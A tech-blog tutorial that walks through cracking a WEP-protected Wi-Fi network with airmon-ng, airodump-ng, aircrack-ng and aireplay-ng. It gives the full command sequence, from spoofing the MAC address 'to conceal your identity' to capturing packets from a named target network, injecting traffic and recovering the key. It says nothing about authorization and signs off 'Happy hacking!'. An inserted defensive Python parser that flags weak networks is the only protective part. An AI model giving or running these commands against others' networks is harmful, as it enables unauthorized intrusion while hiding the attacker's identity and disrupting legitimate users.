Techblog

Technical Blog about all things computer

  • Aug 12

    1.) WEP is a weak encryption system. In this tutorial, we will crack WEP encryption using the aircrack-ng suite (airmon-ng, airodump-ng and aircrack-ng) and obtain the key.

    2.) You will need a wireless card, airmon-ng and macchanger. I’m assuming that you already have a wireless card set up properly on a Debian Linux distribution. Otherwise you will need to use ndiswrapper to set it up. See my blog post on how to set up a “Wireless Bridge Router with Debian” to do this.

    3.) Install aircrack-ng (the package that provides airmon-ng) and macchanger

    apt-get install aircrack-ng

    apt-get install macchanger

    4.) Run airmon-ng to get a list of network interfaces. The screenshot below shows the interface and driver name. I’m using the Trendnet TEW228-PI wireless card; the driver name is rtl8180 and the interface is wlan0.

    airmon-ng

    Results for airmon-ng

    5.) Stop airmon-ng, bring down the interface and change your network card’s MAC address to conceal your identity. Replace (interface) with the interface name found in the screenshot above.

    airmon-ng stop (interface)

    ifconfig (interface) down

    macchanger --mac 00:11:22:33:44:55 (interface)

    airmon-ng start (interface)

    My wireless card is configured as wlan0, so the commands below are what I ran.

    airmon-ng stop wlan0

    ifconfig wlan0 down

    macchanger --mac 00:11:22:33:44:55 wlan0

    airmon-ng start wlan0

    6.) Check which wireless networks are available.

    airodump-ng (interface)

    If wlan0 is your interface:

    airodump-ng wlan0

    Provides a list of available wireless networks

    7.) The screenshot above contains the BSSID (the MAC address of the router), PWR (signal strength), #Data (the number of data packets captured), CH (channel), MB (transfer rate) and ENC (the type of encryption). In this exercise we are only hacking WEP. WPA is a much stronger encryption scheme and requires a different process to hack it. So we want to hack the “home” (ESSID) network. We do so by typing in the following.

    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

    Fill in the channel and BSSID from the airodump-ng (interface) results. Replace (interface) with your interface; (file name) is the file to write the captured data packets into. In my case, I ran the following.

    airodump-ng -c 6 -w home --bssid 00:12:0E:3C:BC:60 wlan0

    Starts capturing data into a file
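    Since the ENC column is what tells you whether a network is still on WEP, here is an added example (not from the original post) of the defender-side use of the same table: a small Python parser for the airodump-ng layout described in step 7 that flags WEP, open and TKIP networks so they can be migrated to WPA2/WPA3. The sample output is constructed, not a real capture; the column order and the cipher/auth token sets are assumptions about the tool's display format.

```python
import re

# Constructed sample in the column layout the post's screenshot describes
# (BSSID, PWR, Beacons, #Data, #/s, CH, MB, ENC, CIPHER, AUTH, ESSID).
# Not real capture output; the WEP row reuses the post's BSSID and ESSID.
SAMPLE_AIRODUMP = """\
 BSSID              PWR  Beacons   #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:12:0E:3C:BC:60   41      318    2710    5   6  54   WEP  WEP         home
 AA:BB:CC:00:00:01   23      120      14    0  11  54e  WPA2 CCMP   PSK  Guest Wifi
 AA:BB:CC:00:00:02   17       88       0    0   1  54   OPN              CoffeeShop
 AA:BB:CC:00:00:03   30      200     900    2   6  54e  WPA  TKIP   PSK  legacy-net
"""

# Assumed token sets for the CIPHER and AUTH columns (both may be blank).
CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "GCMP", "WRAP"}
AUTHS = {"PSK", "MGT", "SKA", "OPN"}
ROW = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<pwr>-?\d+)\s+"
    r"(?P<beacons>\d+)\s+(?P<data>\d+),?\s+(?P<rate>\d+)\s+(?P<ch>\d+)\s+"
    r"(?P<mb>\S+)\s+(?P<enc>OPN|WEP|WPA3|WPA2|WPA)\b(?P<rest>.*)$"
)

def parse_airodump(text):
    """Parse access-point rows into dicts; ESSID is whatever follows the cipher/auth tokens."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, blank line, or a station row we do not care about
        tokens = m.group("rest").split()
        cipher = auth = ""
        if tokens and tokens[0] in CIPHERS:
            cipher = tokens.pop(0)
        if tokens and tokens[0] in AUTHS:
            auth = tokens.pop(0)
        rows.append({"bssid": m.group("bssid"), "channel": int(m.group("ch")),
                     "data": int(m.group("data")), "enc": m.group("enc"),
                     "cipher": cipher, "auth": auth, "essid": " ".join(tokens)})
    return rows

def weak_networks(rows):
    """Return (bssid, essid, reason) for APs that should be moved to WPA2/WPA3."""
    findings = []
    for r in rows:
        if r["enc"] == "WEP":
            findings.append((r["bssid"], r["essid"], "WEP: key recoverable from captured traffic"))
        elif r["enc"] == "OPN":
            findings.append((r["bssid"], r["essid"], "open: no encryption at all"))
        elif r["cipher"] == "TKIP":
            findings.append((r["bssid"], r["essid"], "TKIP: deprecated cipher"))
    return findings
```

An ESSID that happens to equal one of the cipher or auth tokens (for example a network literally named “PSK”) would be misparsed by the positional token stripping; airodump-ng's CSV output avoids that ambiguity if you need exact names.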

    8.) #Data is the field we are interested in. It tells you how many data packets have been captured and written to the file. You will need at least 15,000 #Data to crack the WEP key. I was able to crack “home” with 25,000 #Data, leaving the computer running for 10 hours. This is the passive method of hacking. If you want to speed things up, you can force packets into the network, but the disadvantages are that it’s not that much faster and it prevents anybody from connecting to the network. See Active Hacking below for more info.

    9.) Finally, after obtaining enough #Data, it’s time to get the key. Run this command.

    aircrack-ng -b (bssid) (file name-01.cap)

    In my case I had to type the following:

    aircrack-ng -b 00:12:0E:3C:BC:60 home-03.cap

    10.) It should display something like this if the key is found:

    KEY FOUND! [ 99:83:4E:00:38 ] (ASCII: ETND9 )

    99834E0038 is the WEP key.

    That’s it! Happy hacking!

    ACTIVE HACKING

    1.) Continuing from step #8, open a new window and type the following:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    2.) Then run the following:

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

    3.) Go back to step #9 after getting enough #Data.